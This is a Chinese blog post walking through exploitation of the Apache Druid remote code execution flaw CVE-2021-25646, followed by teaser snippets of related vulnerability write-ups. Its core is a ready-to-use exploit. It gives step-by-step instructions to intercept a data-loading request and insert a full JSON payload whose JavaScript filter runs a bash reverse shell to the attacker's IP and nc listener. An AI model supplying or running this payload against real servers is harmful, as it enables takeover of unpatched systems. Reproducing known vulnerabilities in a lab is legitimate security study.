代码编织梦想

1.简介
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

2.漏洞概述
编号:CVE-2021-25646(严重)
Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。

3.影响版本
Apache Druid < 0.20.1
4.复现过程

1.在url处添加/status可以查看当前版本

2.打开url依次点击Load data -> Local disk-> Connect data

3.右侧 base directory 填入:quickstart/tutorial/

file filter填入:wikiticker-2015-09-12-sampled.json.gz

4.点击apply,可以用burp抓包

5.在自己的攻击机中使用nc监听自定义的端口

6.插入以下payload (将以下的ip和端口替换为自己攻击机的)

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",

"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/端口 0>&1')}",

"dimension":"added",

"":{

"enabled":"true"

}

}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}

发送数据包

  1. 攻击机中可以看到可以执行命令了

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68206062/article/details/127902766

Apache Druid 远程代码执行漏洞 CVE-2021-25646-爱代码爱编程

Apache Druid 远程代码执行漏洞 CVE-2021-25646 漏洞描述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache D

Apache Druid命令执行漏洞(CVE-2021-25646)复现-爱代码爱编程

0x00 漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验

Apache Druid远程命令执行漏洞复现(CVE-2021-25646)-爱代码爱编程

漏洞概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Drui

Apache Druid 命令执行漏洞复现(CVE-2021-25646)-爱代码爱编程

0x00简介 Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分

Apache Druid 远程代码执行漏洞(CVE-2021-26919)-爱代码爱编程

Apache Druid 远程代码执行漏洞(CVE-2021-26919) 漏洞名称 : Apache Druid 远程代码执行漏洞(CVE-2021-26919) 组件名称 : Apache Druid 影响范围 : Apache Druid <0.20.2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远

Apache druid未授权命令执行漏洞复现(CVE-2021-25646)-爱代码爱编程

Apache druid未授权命令执行漏洞复现(CVE-2021-25646) 1.简介 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 2.漏洞概述 编号:CVE-2021-25646(严重) Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,

CVE-2021-25646 Apache Druid 访问控制错误漏洞复现-爱代码爱编程

0x01 漏洞概述 Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。 0x02 影响版本 Apach

CVE-2021-25646:Apache Druid远程代码执行漏洞-爱代码爱编程

一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用

Apache Druid任意文件读取漏洞(CVE-2021-36749)-爱代码爱编程

1.漏洞描述         Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的,可以通过将文件URL传递给HTTP InputSource来绕过。因此未经授权的远

Apache Druid远程代码执行漏洞(CVE-2021-25646)-爱代码爱编程

1.漏洞描述         Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的js

Apache Log4j2远程代码执行漏洞(CVE-2021-44228)漏洞复现-爱代码爱编程

文章目录 0x00 漏洞简介0x01 影响范围0x02 环境搭建(Vulhub)0x03 Dnslog出网测试0x04 JNDI注入反弹shell 0x00 漏洞简介 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。 该工具重写了Log4j框架,并且引入了大量丰富的特

apache druid远程命令执行(cve-2021-25646)复现_恸.283的博客-爱代码爱编程

漏洞概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Drui